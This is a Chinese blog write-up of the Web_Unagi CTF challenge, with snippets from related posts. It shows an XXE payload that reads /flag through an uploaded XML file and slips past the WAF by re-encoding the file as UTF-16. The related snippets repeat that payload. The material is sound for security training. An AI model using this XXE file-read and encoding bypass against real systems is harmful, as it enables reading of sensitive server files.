BUUCTF-[CSAWQual 2019]Web_Unagi 1

原创于 2024-11-10 17:26:12 发布 · 428 阅读

5 ·

CC 4.0 BY-SA版权

文章标签：

#web

打开题目

有个upload，能上传文件

有一段提示，翻译过来是你可以在此处查看格式示例，点击here

给了一段xml文档，尝试在xml文档中添加xxe注入攻击，新建一个xml文档

定义文档类型为users，并在其中定义了一个实体xxe，通过SYSTEM关键字指定其值从本地文件系统的/flag文件中读取

<intro> 引用外部实体 &xxe;，如果这个 XML 被解析，会尝试读取 /flag 文件的内容并显示在这里。

<?xml version='1.0'?>

<!DOCTYPE users [

<!ENTITY xxe SYSTEM "file:///flag" >]>

<users>

<user>

<username>alice</username>

<password>passwd1</password>

<name>Alice</name>

<email>alice@fakesite.com</email>

</user>

<user>

上传后发现被waf拦截了

这个时候转换为其他编码绕过waf

在 UTF-16 编码下，XML 文档中的字符表示方式发生了改变。这可能会影响waf对外部实体引用（如 <!ENTITY xxe SYSTEM "file:///flag" >）的识别和处理。

waf在处理 UTF-16 编码的 XML 时，无法正确解析或识别外部实体引用，从而让包含恶意外部实体的 XML 文档得以通过。

使用vscode通过编码保存

转换编码为utf-16

再上传就能绕过waf，得到flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

diandian~

关注关注

4
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[CSAWQual 2019]Web_Unagi - 文件上传+XXE注入(XML编码绕过)

oZuoShen123的博客

10-10

1696

alice passwd1 Alice alice@fakesite.com CSAW2019 bob passwd2 Bob bob@fakesite.c

buuctf_练[CSAWQual 2019]Web_Unagi

m0_66225311的博客

10-26

526

`XXE`漏洞利用，`xml`文件转换编码绕过`WAF`(UTF-8 --> UTF-16)，`xml`文件格式的书写

参与评论您还未登录，请先登录后发表或查看评论

[CSAWQual 2019]Web_Unagi

snowlyzz的博客

09-13

255

xxe 绕过waf。

BUUCTF [CSAWQual 2019]Web_Unagi 1

weixin_45642610的博客

09-09

780

BUUCTF [CSAWQual 2019]Web_Unagi 1 提示在/flag 有提示了上传xml文件及其格式直接用之前xml注入的上传即可。改文件名为1.xml上传即可得flag <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>&xx

BUUCTF:[CSAWQual 2019]Web_Unagi

../../../../../../../

06-08

1125

打开界面看看其他有什么内容：来看看格式事例：从信息提示我们可以知道要通过编写xml文件上传即通过XXE编码转换成utf-16编码绕过我们可以利用vim编辑xml文件（取名为2.xml) 构造payload如下： <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <

BUUCTF：[CSAWQual 2019]Web_Unagi -- xxe 简单的外部实体bypass ，编码绕过，

Zero_Adam的博客

04-08

813

二、学的的这个好像是xxe的那啥，默认技巧吧，，utf8上传说有waf，然后就换成utf16进行上传最近做的xxe的题，都是简单的每waf的。外部实体注入就好了，，，注意，如果，system的命令 file:///flag。不好使的时候，还可用 PHP的伪协议来做，php://filer/这些来，到时候多试试就好了三、 WP 初末看一下iconv命令吧，总不能一个题什么都没学到东西啊，语句： iconv -f utf8 -t utf16 test.xml -o aaa.xml 这个语句弄上

[CSAWQual 2019]Web_Unagi xxe转码绕过waf

qq_54929891的博客

04-28

1565

搜索给我们的信息 flag在flag下面，可能要用到文件读取或者系统命令可以看到它叫我们上传一个xml文件，应该是xxe漏洞了这里应该是提示我们会回显哪些属性，可以看到password没有显示出来利用之前的XXE模板https://xz.aliyun.com/t/6887#toc-0 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]&gt.

BUUCTF：[CSAWQual 2019]Web_Unagi

末初 · mochu7

04-06

2239

XXE编码转换为UTF-16绕过 2.xml <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> ...

BUUCTF--[CSAWQual 2019]Web_Unagi

qq_46263951的博客

07-22

466

进入页面后看到一个Upload 看到给出的提示是让我们上传一个XML文件,刚好今天做了一个关于XML的XXE漏洞的题,底下贴链接,漏洞点为给出提示flag在/flag中,所以构造出的payload为 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <userna.

[CSAWQual 2019]Web_Unagi ---不会编程的崽

不会编程的崽的博客

03-07

698

xxe编码绕过

[CSAWQual 2019]Web_Unagi XXE漏洞练习题

最新发布

dalaojiaoweb的博客

07-09

480

进来之后我们进行一个信息收集，在upload下可以看到有个here的超链接。点进去之后得到了如下的一些信息。使用我们的Visual Studio Code进行一个编码的转换，因为直接上传会被waf过滤。可以猜到是需要我们利用文件上传包含xxe漏洞利用来得到flag。利用我们学习的xxe漏洞的知识来进行一个模板的套用。最后进行一个文件上传即可得到flag。选择utf-16 LE，然后保存。这道题就是简单的xxe漏洞的注入。

CTF-WEB

just do it

02-04

2332

—http命令行工具，支持文件的上传和下载，可用于扒取内容（url设为百度，就会显示百度的界面——但此时不是跳转到百度，而是在当前页面显示百度的前端——对百度来说，是请求页面的前面的网站请求他的，不是我们的真实IP去请求的——相当于借刀杀人）一般情况下，传参都是传给当前网页，但如果当前网页是重定向的话，重定向的URL本身就是原URL的传参，如果想要文件的读取权限，只能GET传参跟在URL的后面，不能使用POST传参，POST传参是传给原来的URL。

[CSAWQual 2019]Web_Unagi XXE漏洞 [HarekazeCTF2019]Avatar Uploader 1 finfo_file和getimagesize

scrawman的博客

01-27

3373

[CSAWQual 2019]Web_Unagi 看提示有告诉你xml的格式 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> <password>passwd2</passwor

BUUCTF：[GUET-CTF2019]虚假的压缩包

末初 · mochu7

04-07

4854

虚假的压缩包是伪加密，修改第二个PK后五位为偶数即可 RSA，解密脚本如下 import gmpy2 p=gmpy2.mpz(3) q=gmpy2.mpz(11) e=gmpy2.mpz(3) l=(p-1)*(q-1) d=gmpy2.invert(e,l) c=gmpy2.mpz(26) n=p*q ans=pow(c,d,n) print ans 解压密码是：答案是5，用于解压另一个...

xxe编码绕过（8-19）

Realiy的博客

08-19

1886

[CSAWQual 2019]Web_Unagi 只能上传xml文件，考虑存在xxe 直接上传显示waf拦截了，转换成utf16编码就能绕过   <!DOCTYPE users[ <!ENTITY a SYSTEM "file:///flag"> ]> <users> <user> <username>Alice</u

[CSAWQual 2019]Unagi

07-27

- *3* [BUUCTF [CSAWQual 2019]Web_Unagi 1](https://blog.youkuaiyun.com/weixin_45642610/article/details/120201638)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...